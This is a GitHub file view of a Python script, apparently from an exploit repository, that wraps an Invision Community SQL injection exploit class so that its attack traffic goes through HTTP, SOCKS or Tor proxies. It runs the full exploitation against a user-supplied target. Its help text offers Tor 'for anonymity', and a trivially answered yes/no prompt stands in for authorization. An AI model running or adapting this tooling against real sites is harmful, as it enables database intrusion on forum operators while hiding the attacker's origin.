-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathproxy_example.py
More file actions
135 lines (104 loc) · 4.41 KB
/
Copy pathproxy_example.py
File metadata and controls
135 lines (104 loc) · 4.41 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
#!/usr/bin/env python3
"""
Proxy Configuration Example
This script demonstrates how to route exploit traffic through a proxy.
Useful for:
- Testing through corporate proxies
- Using Burp Suite for traffic analysis
- Routing through Tor for anonymity (authorized testing only)
Usage:
python proxy_example.py -u http://target.com/forum/ -p http://127.0.0.1:8080
"""
import sys
import argparse
sys.path.insert(0, '..')
try:
from invision_sqli_exploit import InvisionSQLiExploit
from colorama import Fore, Style, init
except ImportError as e:
print(f"Error: {e}")
print("Make sure dependencies are installed: pip install -r requirements.txt")
sys.exit(1)
init(autoreset=True)
class ProxyInvisionExploit(InvisionSQLiExploit):
"""Extended exploit class with proxy support"""
def __init__(self, target_url, proxy_url, verbose=False):
"""
Initialize exploit with proxy configuration
Args:
target_url (str): Target Invision Community URL
proxy_url (str): Proxy URL (e.g., http://127.0.0.1:8080)
verbose (bool): Enable verbose output
"""
super().__init__(target_url, verbose)
# Configure proxy
self.session.proxies = {
'http': proxy_url,
'https': proxy_url
}
self.log_info(f"Proxy configured: {proxy_url}")
def main():
parser = argparse.ArgumentParser(
description="Use SQL injection exploit through a proxy",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
1. HTTP Proxy (Burp Suite):
python proxy_example.py -u http://target.com/ -p http://127.0.0.1:8080
2. SOCKS Proxy:
python proxy_example.py -u http://target.com/ -p socks5://127.0.0.1:9050
3. Tor (authorized testing only):
python proxy_example.py -u http://target.com/ -p socks5://127.0.0.1:9050
4. With authentication:
python proxy_example.py -u http://target.com/ -p http://user:pass@proxy.com:8080
Notes:
- For SOCKS proxies, install: pip install requests[socks]
- Burp Suite default proxy: http://127.0.0.1:8080
- Tor default SOCKS proxy: socks5://127.0.0.1:9050
"""
)
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-p', '--proxy', required=True, help='Proxy URL')
parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')
parser.add_argument('--test-only', action='store_true', help='Only test connection, no exploitation')
args = parser.parse_args()
# Display disclaimer
print(f"\n{Fore.RED}{'='*70}")
print(f"{Fore.RED}PROXY MODE - Authorized Testing Only")
print(f"{Fore.RED}{'='*70}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}All traffic will be routed through: {args.proxy}{Style.RESET_ALL}")
print(f"\n{Fore.YELLOW}Do you have authorization? (yes/no){Style.RESET_ALL}")
if input("> ").strip().lower() not in ['yes', 'y']:
print(f"\n{Fore.RED}Aborted.{Style.RESET_ALL}\n")
sys.exit(0)
# Initialize exploit with proxy
try:
exploit = ProxyInvisionExploit(args.url, args.proxy, args.verbose)
except Exception as e:
print(f"{Fore.RED}[-] Failed to initialize exploit: {e}{Style.RESET_ALL}")
sys.exit(1)
# Test connection
print(f"\n{Fore.CYAN}[*] Testing connection through proxy...{Style.RESET_ALL}")
if not exploit.fetch_csrf_token():
print(f"{Fore.RED}[-] Connection test failed!{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[!] Check:{Style.RESET_ALL}")
print(f" - Proxy is running and accessible")
print(f" - Target URL is correct")
print(f" - Network connectivity")
sys.exit(1)
print(f"{Fore.GREEN}[+] Connection successful through proxy!{Style.RESET_ALL}")
if args.test_only:
print(f"\n{Fore.GREEN}[+] Test mode completed successfully{Style.RESET_ALL}\n")
sys.exit(0)
# Run full exploitation
print(f"\n{Fore.CYAN}[*] Starting exploitation through proxy...{Style.RESET_ALL}")
result = exploit.exploit()
if result:
print(f"\n{Fore.GREEN}[+] Exploitation successful!{Style.RESET_ALL}")
print(f"{Fore.YELLOW}Note: All traffic was routed through proxy{Style.RESET_ALL}\n")
sys.exit(0)
else:
print(f"\n{Fore.RED}[-] Exploitation failed{Style.RESET_ALL}\n")
sys.exit(1)
if __name__ == "__main__":
main()